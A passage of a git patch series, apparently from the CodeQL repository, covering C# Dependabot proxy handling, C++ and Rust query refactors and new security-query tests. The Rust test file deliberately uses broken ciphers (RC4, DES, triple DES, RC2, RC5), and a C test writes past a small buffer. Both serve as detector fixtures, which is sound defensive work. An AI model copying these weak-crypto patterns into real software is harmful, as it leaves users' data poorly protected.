+12,11 @@ namespace Semmle.Extraction.CSharp.DependencyFetching internal sealed class DotNetCliInvoker : IDotNetCliInvoker { private readonly ILogger logger; - private readonly DependabotProxy proxy; + private readonly DependabotProxy? proxy; public string Exec { get; } - public DotNetCliInvoker(ILogger logger, string exec, DependabotProxy dependabotProxy) + public DotNetCliInvoker(ILogger logger, string exec, DependabotProxy? dependabotProxy) { this.logger = logger; this.proxy = dependabotProxy; @@ -42,7 +42,14 @@ namespace Semmle.Extraction.CSharp.DependencyFetching startInfo.EnvironmentVariables["DOTNET_SKIP_FIRST_TIME_EXPERIENCE"] = "true"; // Configure the proxy settings, if applicable. - this.proxy.ApplyProxy(this.logger, startInfo); + if (this.proxy != null) + { + logger.LogInfo($"Setting up Dependabot proxy at {this.proxy.Address}"); + + startInfo.EnvironmentVariables.Add("HTTP_PROXY", this.proxy.Address); + startInfo.EnvironmentVariables.Add("HTTPS_PROXY", this.proxy.Address); + startInfo.EnvironmentVariables.Add("SSL_CERT_FILE", this.proxy.CertificatePath); + } return startInfo; } diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index a01b3ae9649..d0c0af6b768 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs @@ -22,7 +22,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching private readonly FileProvider fileProvider; private readonly FileContent fileContent; private readonly IDotNet dotnet; - private readonly DependabotProxy dependabotProxy; + private readonly DependabotProxy? dependabotProxy; private readonly IDiagnosticsWriter diagnosticsWriter; private readonly TemporaryDirectory legacyPackageDirectory; private readonly TemporaryDirectory missingPackageDirectory; @@ -35,7 +35,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching FileProvider fileProvider, FileContent fileContent, IDotNet dotnet, - DependabotProxy dependabotProxy, + DependabotProxy? dependabotProxy, IDiagnosticsWriter diagnosticsWriter, ILogger logger, ICompilationInfoContainer compilationInfoContainer) @@ -596,7 +596,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching // Configure the HttpClient to be aware of the Dependabot Proxy, if used. HttpClientHandler httpClientHandler = new(); - if (this.dependabotProxy.IsConfigured) + if (this.dependabotProxy != null) { httpClientHandler.Proxy = new WebProxy(this.dependabotProxy.Address); From 7369d043ed1e9438e69cf9c4c7b4bdcd988e6465 Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Thu, 5 Dec 2024 12:25:45 +0000 Subject: [PATCH 0828/1267] C#: Don't initialise `DependabotProxy` on Windows or macOS --- .../DependabotProxy.cs | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index d1a5df4dbc5..09f5a15a21d 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -27,6 +27,13 @@ namespace Semmle.Extraction.CSharp.DependencyFetching internal static DependabotProxy? GetDependabotProxy(ILogger logger, TemporaryDirectory tempWorkingDirectory) { + // Setting HTTP(S)_PROXY and SSL_CERT_FILE have no effect on Windows or macOS, + // but we would still end up using the Dependabot proxy to check for feed reachability. + // This would result in us discovering that the feeds are reachable, but `dotnet` would + // fail to connect to them. To prevent this from happening, we do not initialise an + // instance of `DependabotProxy` on those platforms. + if (SystemBuildActions.Instance.IsWindows() || SystemBuildActions.Instance.IsMacOs()) return null; + // Obtain and store the address of the Dependabot proxy, if available. var host = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyHost); var port = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyPort); From 952488c2d843d2a0196311f638051b4026b8a32c Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Thu, 5 Dec 2024 12:32:55 +0000 Subject: [PATCH 0829/1267] C#: Fix possible null dereference --- .../DependencyManager.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs index cf4c6d73bd6..b8773f0ae4a 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs @@ -545,7 +545,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching public void Dispose() { nugetPackageRestorer?.Dispose(); - dependabotProxy.Dispose(); + dependabotProxy?.Dispose(); if (cleanupTempWorkingDirectory) { tempWorkingDirectory?.Dispose(); From 667abb19d7705cb0dddad253bc08468097e44d6d Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Thu, 5 Dec 2024 13:13:44 +0000 Subject: [PATCH 0830/1267] C++: Expose a final alias instead of the abstract class. --- .../code/cpp/ir/implementation/EdgeKind.qll | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index 81db183fa63..0fd31c9f45e 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -20,16 +20,18 @@ private newtype TEdgeKind = * `Instruction` or `IRBlock` has at most one successor of any single * `EdgeKind`. */ -abstract class EdgeKind extends TEdgeKind { +abstract private class EdgeKindImpl extends TEdgeKind { /** Gets a textual representation of this edge kind. */ abstract string toString(); } +final class EdgeKind = EdgeKindImpl; + /** * A "goto" edge, representing the unconditional successor of an `Instruction` * or `IRBlock`. */ -class GotoEdge extends EdgeKind, TGotoEdge { +class GotoEdge extends EdgeKindImpl, TGotoEdge { final override string toString() { result = "Goto" } } @@ -37,7 +39,7 @@ class GotoEdge extends EdgeKind, TGotoEdge { * A "true" edge, representing the successor of a conditional branch when the * condition is non-zero. */ -class TrueEdge extends EdgeKind, TTrueEdge { +class TrueEdge extends EdgeKindImpl, TTrueEdge { final override string toString() { result = "True" } } @@ -45,7 +47,7 @@ class TrueEdge extends EdgeKind, TTrueEdge { * A "false" edge, representing the successor of a conditional branch when the * condition is zero. */ -class FalseEdge extends EdgeKind, TFalseEdge { +class FalseEdge extends EdgeKindImpl, TFalseEdge { final override string toString() { result = "False" } } @@ -53,7 +55,7 @@ class FalseEdge extends EdgeKind, TFalseEdge { * An "exception" edge, representing the successor of an instruction when that * instruction's evaluation throws an exception. */ -class ExceptionEdge extends EdgeKind, TExceptionEdge { +class ExceptionEdge extends EdgeKindImpl, TExceptionEdge { final override string toString() { result = "Exception" } } @@ -61,7 +63,7 @@ class ExceptionEdge extends EdgeKind, TExceptionEdge { * A "default" edge, representing the successor of a `Switch` instruction when * none of the case values matches the condition value. */ -class DefaultEdge extends EdgeKind, TDefaultEdge { +class DefaultEdge extends EdgeKindImpl, TDefaultEdge { final override string toString() { result = "Default" } } @@ -69,7 +71,7 @@ class DefaultEdge extends EdgeKind, TDefaultEdge { * A "case" edge, representing the successor of a `Switch` instruction when the * the condition value matches a corresponding `case` label. */ -class CaseEdge extends EdgeKind, TCaseEdge { +class CaseEdge extends EdgeKindImpl, TCaseEdge { string minValue; string maxValue; From fd7469848ea7b9f9b857e3e9ec6cca627bccc6fc Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Thu, 5 Dec 2024 13:16:59 +0000 Subject: [PATCH 0831/1267] C++: Test case for cpp/badly-bounded-write --- .../CWE-120/semmle/tests/BadlyBoundedWrite.expected | 1 + .../Security/CWE/CWE-120/semmle/tests/errors.c | 11 +++++++++++ 2 files changed, 12 insertions(+) create mode 100644 cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/errors.c diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected index 9abc89c68f1..0f9b0567c22 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected @@ -1,2 +1,3 @@ +| errors.c:10:5:10:12 | call to swprintf | This 'call to swprintf' operation is limited to 12 bytes but the destination is only 3 bytes. | | tests.c:43:3:43:10 | call to snprintf | This 'call to snprintf' operation is limited to 111 bytes but the destination is only 110 bytes. | | tests.c:46:3:46:10 | call to snprintf | This 'call to snprintf' operation is limited to 111 bytes but the destination is only 110 bytes. | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/errors.c b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/errors.c new file mode 100644 index 00000000000..a8f509af154 --- /dev/null +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/errors.c @@ -0,0 +1,11 @@ +// semmle-extractor-options: --expect_errors + +typedef unsigned long size_t; +typedef int wchar_t; + +int swprintf(wchar_t *s, size_t n, const wchar_t *format, ...); + +void test_extraction_errors() { + WCHAR buffer[3]; + swprintf(buffer, 3, L"abc"); +} From bdb2f3d091d6ba4cc4305518764009bad27fe4ae Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Tue, 3 Dec 2024 11:13:55 +0000 Subject: [PATCH 0832/1267] Rust: Add placeholder query and tests for 'cipher' module. --- .../security/CWE-327/BrokenCryptoAlgorithm.ql | 17 +++ .../CWE-327/BrokenCryptoAlgorithm.expected | 0 .../CWE-327/BrokenCryptoAlgorithm.qlref | 2 + .../query-tests/security/CWE-327/options.yml | 9 ++ .../security/CWE-327/test_cipher.rs | 117 ++++++++++++++++++ 5 files changed, 145 insertions(+) create mode 100644 rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.ql create mode 100644 rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected create mode 100644 rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.qlref create mode 100644 rust/ql/test/query-tests/security/CWE-327/options.yml create mode 100644 rust/ql/test/query-tests/security/CWE-327/test_cipher.rs diff --git a/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.ql b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.ql new file mode 100644 index 00000000000..3890d54c03b --- /dev/null +++ b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.ql @@ -0,0 +1,17 @@ +/** + * @name Use of a broken or weak cryptographic algorithm + * @description Using broken or weak cryptographic algorithms can compromise security. + * @kind problem + * @problem.severity warning + * @security-severity 7.5 + * @precision high + * @id rust/weak-cryptographic-algorithm + * @tags security + * external/cwe/cwe-327 + */ + +import rust + +from int i +where none() +select i diff --git a/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected b/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.qlref b/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.qlref new file mode 100644 index 00000000000..6b7ff78b567 --- /dev/null +++ b/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.qlref @@ -0,0 +1,2 @@ +query: queries/security/CWE-327/BrokenCryptoAlgorithm.ql +postprocess: utils/InlineExpectationsTestQuery.ql \ No newline at end of file diff --git a/rust/ql/test/query-tests/security/CWE-327/options.yml b/rust/ql/test/query-tests/security/CWE-327/options.yml new file mode 100644 index 00000000000..72d848f4ca0 --- /dev/null +++ b/rust/ql/test/query-tests/security/CWE-327/options.yml @@ -0,0 +1,9 @@ +qltest_cargo_check: true +qltest_dependencies: + - cipher = { version = "0.4.4" } + - rc4 = { version = "0.1.0" } + - rabbit = { version = "0.4.1" } + - aes = { version = "0.8.4" } + - des = { version = "0.8.1" } + - rc2 = { version = "0.8.1" } + - rc5 = { version = "0.0.1" } diff --git a/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs b/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs new file mode 100644 index 00000000000..34f47130e3a --- /dev/null +++ b/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs @@ -0,0 +1,117 @@ + +use cipher::{consts::*, StreamCipher, KeyInit, KeyIvInit, BlockEncrypt, BlockDecrypt, BlockEncryptMut, BlockDecryptMut}; +use rc4::{Rc4}; +use rabbit::{Rabbit, RabbitKeyOnly}; +use aes::{Aes128, Aes192Enc, Aes256Dec}; +use des::{Des, TdesEde2, TdesEde3, TdesEee2, TdesEee3}; +use rc2::{Rc2}; +use rc5::{RC5_16_16_8, RC5_32_16_16}; + +// --- tests --- + +fn test_stream_cipher( + key128: &[u8;16], iv128: &[u8;16], plaintext: &str +) { + let mut data = plaintext.as_bytes().to_vec(); + + // rc4 (broken) + let rc4_key = rc4::Key::::from_slice(key128); + + let mut rc4_cipher1 = Rc4::<_>::new(rc4_key); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + rc4_cipher1.apply_keystream(&mut data); + + let mut rc4_cipher2 = Rc4::::new_from_slice(key128).unwrap(); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + rc4_cipher2.apply_keystream(&mut data); + + let mut rc4_cipher3 = Rc4::<_>::new(rc4_key); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let _ = rc4_cipher3.try_apply_keystream(&mut data); + + let mut rc4_cipher4 = Rc4::<_>::new(rc4_key); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let _ = rc4_cipher4.apply_keystream_b2b(plaintext.as_bytes(), &mut data); + + // rabbit + let rabbit_key = rabbit::Key::from_slice(key128); + let rabbit_iv = rabbit::Iv::from_slice(iv128); + + let mut rabbit_cipher1 = RabbitKeyOnly::new(rabbit_key); + rabbit_cipher1.apply_keystream(&mut data); + + let mut rabbit_cipher2 = Rabbit::new(rabbit_key, rabbit_iv); + rabbit_cipher2.apply_keystream(&mut data); +} + +fn test_block_cipher( + key: &[u8], key128: &[u8;16], key192: &[u8;24], key256: &[u8;32], + data: &mut [u8], input: &[u8], block128: &mut [u8;16] +) { + // aes + let aes_cipher1 = Aes128::new(key128.into()); + aes_cipher1.encrypt_block(block128.into()); + aes_cipher1.decrypt_block(block128.into()); + + let aes_cipher2 = Aes192Enc::new_from_slice(key192).unwrap(); + aes_cipher2.encrypt_block(block128.into()); + + let aes_cipher3 = Aes256Dec::new(key256.into()); + aes_cipher3.decrypt_block(block128.into()); + + // des (broken) + let des_cipher1 = Des::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + des_cipher1.encrypt_block(data.into()); + des_cipher1.decrypt_block(data.into()); + + let des_cipher2 = des::Des::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + des_cipher2.encrypt_block(data.into()); + des_cipher2.decrypt_block(data.into()); + + let des_cipher3 = Des::new_from_slice(key).expect("fail"); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + des_cipher3.encrypt_block(data.into()); + des_cipher3.decrypt_block(data.into()); + + let des_cipher4 = Des::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + des_cipher4.encrypt_block_b2b(input.into(), data.into()); + des_cipher4.decrypt_block_b2b(input.into(), data.into()); + + let mut des_cipher5 = Des::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + des_cipher5.encrypt_block_mut(data.into()); + des_cipher5.decrypt_block_mut(data.into()); + + // triple des (broken) + let tdes_cipher1 = TdesEde2::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + tdes_cipher1.encrypt_block(data.into()); + tdes_cipher1.decrypt_block(data.into()); + + let tdes_cipher2 = TdesEde3::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + tdes_cipher2.encrypt_block(data.into()); + tdes_cipher2.decrypt_block(data.into()); + + let tdes_cipher3 = TdesEee2::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + tdes_cipher3.encrypt_block(data.into()); + tdes_cipher3.decrypt_block(data.into()); + + let tdes_cipher4 = TdesEee3::new_from_slice(key).unwrap(); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + tdes_cipher4.encrypt_block(data.into()); + tdes_cipher4.decrypt_block(data.into()); + + // rc2 (broken) + let rc2_cipher1 = Rc2::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + rc2_cipher1.encrypt_block(data.into()); + rc2_cipher1.decrypt_block(data.into()); + + let rc2_cipher2 = Rc2::new_from_slice(key).expect("fail"); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + rc2_cipher2.encrypt_block(data.into()); + rc2_cipher2.decrypt_block(data.into()); + + let rc2_cipher3 = Rc2::new_with_eff_key_len(key, 64); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + rc2_cipher3.encrypt_block(data.into()); + rc2_cipher3.decrypt_block(data.into()); + + // rc5 (broken) + let rc5_cipher1 = RC5_16_16_8::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + rc5_cipher1.encrypt_block(data.into()); + rc5_cipher1.decrypt_block(data.into()); + + let rc5_cipher2 = RC5_32_16_16::new_from_slice(key).unwrap(); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + rc5_cipher2.encrypt_block(data.into()); + rc5_cipher2.decrypt_block(data.into()); +} From 1c56692c027a7433fc98f2d2934b11107ba18072 Mon Sep 17 00:00:00 2001 From: Tom Hvitved Date: Thu, 5 Dec 2024 14:43:39 +0100 Subject: [PATCH 0833/1267] Rust: update inline expectations --- rust/ql/test/library-tests/dataflow/sources/test.rs | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rust/ql/test/library-tests/dataflow/sources/test.rs b/rust/ql/test/library-tests/dataflow/sources/test.rs index e4701865a7e..7b33a00864e 100644 --- a/rust/ql/test/library-tests/dataflow/sources/test.rs +++ b/rust/ql/test/library-tests/dataflow/sources/test.rs @@ -38,11 +38,11 @@ fn test_env_args() { sink(arg3); // $ MISSING: hasTaintFlow for arg in std::env::args() { // $ Alert[rust/summary/taint-sources] - sink(arg); // $ MISSING: hasTaintFlow + sink(arg); // $ hasTaintFlow } for arg in std::env::args_os() { // $ Alert[rust/summary/taint-sources] - sink(arg); // $ MISSING: hasTaintFlow + sink(arg); // $ hasTaintFlow } } From 5bebfdeb2ae3988a34f79159f2803f8ba1717ed0 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Thu, 5 Dec 2024 13:59:59 +0000 Subject: [PATCH 0834/1267] C#: Add a MaD model for the 'Microsoft.AspNetCore.Mvc.Controller.View' method. --- .../ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml diff --git a/csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml b/csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml new file mode 100644 index 00000000000..e980e51810b --- /dev/null +++ b/csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/csharp-all + extensible: summaryModel + data: + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "()", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.Object)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.String)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.String,System.Object)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "taint", "manual"] + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "()", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.Object)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.String)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.String,System.Object)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] From ed4819aeab6ecdf3c5fa924e0e777423e64b6cf7 Mon Sep 17 00:00:00 2001 From: Tom Hvitved Date: Thu, 5 Dec 2024 15:18:25 +0100 Subject: [PATCH 0835/1267] Rust: Cache `defaultAdditionalTaintStep` --- .../rust/dataflow/internal/DataFlowImpl.qll | 4 ++- .../dataflow/internal/TaintTrackingImpl.qll | 3 ++ .../rust/elements/internal/ArrayExprImpl.qll | 2 +- .../lib/codeql/rust/internal/CachedStages.qll | 34 ++++++++++++++++--- 4 files changed, 37 insertions(+), 6 deletions(-) diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index b22b27c4db6..80fb80e7dc6 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll @@ -1101,9 +1101,11 @@ import MakeImpl /** A collection of cached types and predicates to be evaluated in the same stage. */ cached private module Cached { + private import codeql.rust.internal.CachedStages + cached newtype TNode = - TExprNode(ExprCfgNode n) or + TExprNode(ExprCfgNode n) { Stages::DataFlowStage::ref() } or TSourceParameterNode(ParamBaseCfgNode p) or TPatNode(PatCfgNode p) or TExprPostUpdateNode(ExprCfgNode e) { diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll index 13f0052a5ba..25cc7e22faf 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll @@ -4,6 +4,7 @@ private import codeql.rust.controlflow.CfgNodes private import codeql.rust.dataflow.FlowSummary private import DataFlowImpl private import FlowSummaryImpl as FlowSummaryImpl +private import codeql.rust.internal.CachedStages module RustTaintTracking implements InputSig { predicate defaultTaintSanitizer(Node::Node node) { none() } @@ -12,7 +13,9 @@ module RustTaintTracking implements InputSig { * Holds if the additional step from `pred` to `succ` should be included in all * global taint flow configurations. */ + cached predicate defaultAdditionalTaintStep(Node::Node pred, Node::Node succ, string model) { + Stages::DataFlowStage::ref() and model = "" and ( exists(BinaryExprCfgNode binary | diff --git a/rust/ql/lib/codeql/rust/elements/internal/ArrayExprImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/ArrayExprImpl.qll index 13abb32bcce..97f237e4772 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/ArrayExprImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/ArrayExprImpl.qll @@ -22,7 +22,7 @@ module Impl { * ``` */ class ArrayExpr extends Generated::ArrayExpr { - cached + pragma[nomagic] private Raw::ArrayExprInternal getUnderlyingEntity() { this = Synth::TArrayListExpr(result) or this = Synth::TArrayRepeatExpr(result) } diff --git a/rust/ql/lib/codeql/rust/internal/CachedStages.qll b/rust/ql/lib/codeql/rust/internal/CachedStages.qll index 1fdd3c2a9b8..0cf3c32921e 100644 --- a/rust/ql/lib/codeql/rust/internal/CachedStages.qll +++ b/rust/ql/lib/codeql/rust/internal/CachedStages.qll @@ -35,10 +35,6 @@ module Stages { */ cached module AstStage { - private import codeql.rust.controlflow.internal.Splitting - private import codeql.rust.controlflow.internal.SuccessorType - private import codeql.rust.controlflow.internal.ControlFlowGraphImpl - /** * Always holds. * Ensures that a predicate is evaluated as part of the AST stage. @@ -98,4 +94,34 @@ module Stages { exists(CallExprCfgNode n | exists(n.getFunction())) } } + + /** + * The data flow stage. + */ + cached + module DataFlowStage { + private import codeql.rust.dataflow.internal.DataFlowImpl + private import codeql.rust.dataflow.internal.TaintTrackingImpl + + /** + * Always holds. + * Ensures that a predicate is evaluated as part of the data flow stage. + */ + cached + predicate ref() { 1 = 1 } + + /** + * DO NOT USE! + * + * Contains references to each predicate that use the above `ref` predicate. + */ + cached + predicate backref() { + 1 = 1 + or + exists(Node n) + or + RustTaintTracking::defaultAdditionalTaintStep(_, _, _) + } + } } From b7f47f752b0d80608fd803cce6a91afa3f662719 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Thu, 5 Dec 2024 14:37:19 +0000 Subject: [PATCH 0836/1267] C++: Remove FPs from cpp/badly-bounded-write --- cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql | 3 ++- .../CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected | 1 - 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql b/cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql index e7dd6a5d8e3..e89ffac906e 100644 --- a/cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql +++ b/cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql @@ -25,7 +25,8 @@ from BufferWrite bw, int destSize where bw.hasExplicitLimit() and // has an explicit size limit destSize = max(getBufferSize(bw.getDest(), _)) and - bw.getExplicitLimit() > destSize // but it's larger than the destination + bw.getExplicitLimit() > destSize and // but it's larger than the destination + not bw.getDest().getUnderlyingType().stripType() instanceof ErroneousType // destSize may be incorrect select bw, "This '" + bw.getBWDesc() + "' operation is limited to " + bw.getExplicitLimit() + " bytes but the destination is only " + destSize + " bytes." diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected index 0f9b0567c22..9abc89c68f1 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected @@ -1,3 +1,2 @@ -| errors.c:10:5:10:12 | call to swprintf | This 'call to swprintf' operation is limited to 12 bytes but the destination is only 3 bytes. | | tests.c:43:3:43:10 | call to snprintf | This 'call to snprintf' operation is limited to 111 bytes but the destination is only 110 bytes. | | tests.c:46:3:46:10 | call to snprintf | This 'call to snprintf' operation is limited to 111 bytes but the destination is only 110 bytes. | From 4af18be70b8ef10519a22f604fcd1cd0cd027cfa Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Thu, 5 Dec 2024 14:42:59 +0000 Subject: [PATCH 0837/1267] C#: Add change note. --- csharp/ql/lib/change-notes/2024-12-05-aspnetcore-mvc-model.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 csharp/ql/lib/change-notes/2024-12-05-aspnetcore-mvc-model.md diff --git a/csharp/ql/lib/change-notes/2024-12-05-aspnetcore-mvc-model.md b/csharp/ql/lib/change-notes/2024-12-05-aspnetcore-mvc-model.md new file mode 100644 index 00000000000..04afe96522b --- /dev/null +++ b/csharp/ql/lib/change-notes/2024-12-05-aspnetcore-mvc-model.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* Added flow summaries for the `Microsoft.AspNetCore.Mvc.Controller::View` method. \ No newline at end of file From 41f08d9b84c74b5719ef37d7775581bcbf6b2a09 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Thu, 5 Dec 2024 